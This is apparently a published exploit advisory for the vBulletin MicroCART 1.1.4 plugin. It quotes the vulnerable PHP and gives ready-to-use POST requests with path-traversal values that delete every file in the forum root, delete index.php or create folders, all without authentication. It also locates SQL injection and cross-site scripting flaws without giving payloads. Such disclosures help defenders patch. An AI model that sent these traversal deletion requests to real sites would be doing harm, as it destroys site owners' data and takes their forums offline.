# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
SQL Injection & XSS
# Date: January 8, 2015# Exploit Author: Technidev (https://technidev.com)# Vendor Homepage: https://vbulletin.com# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723# Version: 1.1.4
This plugin is fairly old but still used by a lot of people and received
its last update nearly 4 years ago.
It’s vulnerable to arbitrary file deletion and SQL injection.*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ are a bunch of files which are
probably used to manage files/folders for the administrator,
unfortunately no authentication and checks were added to see if the user
should have access to it andif the request doesn’t contain anything
malicious.
The /microcart/editor/assetmanager/folderdel_.php file contains the
following on top:
$sMsg ="";if(isset($_POST["inpCurrFolder"])){
$sDestination = pathinfo($_POST["inpCurrFolder"]);//DELETE ALL FILES IF FOLDER NOT EMPTY
$dir= $_POST["inpCurrFolder"];
$handle = opendir($dir);while($file= readdir($handle))if($file!="."&& $file!="..")
unlink($dir."/". $file);
closedir($handle);if(rmdir($_POST["inpCurrFolder"])==0)
$sMsg ="";else
$sMsg ="<script>document.write(getTxt('Folder deleted.'))</script>";}
By simply sending a POST request to this file, we can delete every
single filein specified folder.
POST to:/microcart/editor/assetmanager/folderdel_.php
POST data:inpCurrFolder:../../../
This POST request will delete every single .php filein the root folder
of vBulletin.*Arbitrary File Deletion*
There’s another vulnerability which resides in the
/microcart/editor/assetmanager/assetmanager.php file. It contains an
upload function, which is safe,and a file deletion function, which isnot safe. We can delete anyfile off the server by abusing this. So
unlike the previous vulnerability I just wrote which deletes all files
by sending a POST request with a folder value, this will only delete 1file off the server.
Vulnerable code:if(isset($_POST["inpFileToDelete"])){
$filename=pathinfo($_POST["inpFileToDelete"]);
$filename=$filename['basename'];if($filename!="")
unlink($currFolder ."/". $filename);
$sMsg ="";}
Exploited by sending the following request:
POST to:/microcart/editor/assetmanager/assetmanager.php
POST data:inpCurrFolder:../../../
inpFileToDelete: index.php
This will delete the /index.php file of vBulletin,in the root.*Aribtrary Folder Creation*
Besides the file deletion, there’s a file called
/microcart/editor/assetmanager/foldernew.php which created a 0755
chmodded folder on the server.
The file contains the following on top:
$sMsg ="";if(isset($_POST["inpNewFolderName"])){
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];if(is_dir($sFolder)==1){//folder already exist
$sMsg = "<script>document.write(getTxt('Folder already
exists.'))</script>";}else{//if(mkdir($sFolder))if(mkdir($sFolder,0755))
$sMsg ="<script>document.write(getTxt('Folder created.'))</script>";else
$sMsg ="<script>document.write(getTxt('Invalid input.'))</script>";}}
By sending the following POST request, we will create a folder with0755
chmodded permission.
POST to:/microcart/editor/assetmanager/foldernew.php
POST data:inpNewFolderName: davewashere
inpCurrFolder:../../..
This POST request will create the folder davewashere in the root of the
vBulletin forum.*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations
although most of them are rather hard to abuse. I will not explain how
to exploit it, but the vulnerability can be found at /cart.php line 833
to 881and the function where you can add products to your shopping
cart, at around line 1251 to 1328 where $_POST[‘fields’]is assigned to
the configuration variable which is later used in a query.*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject
anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out
the wysiwyg POST key.
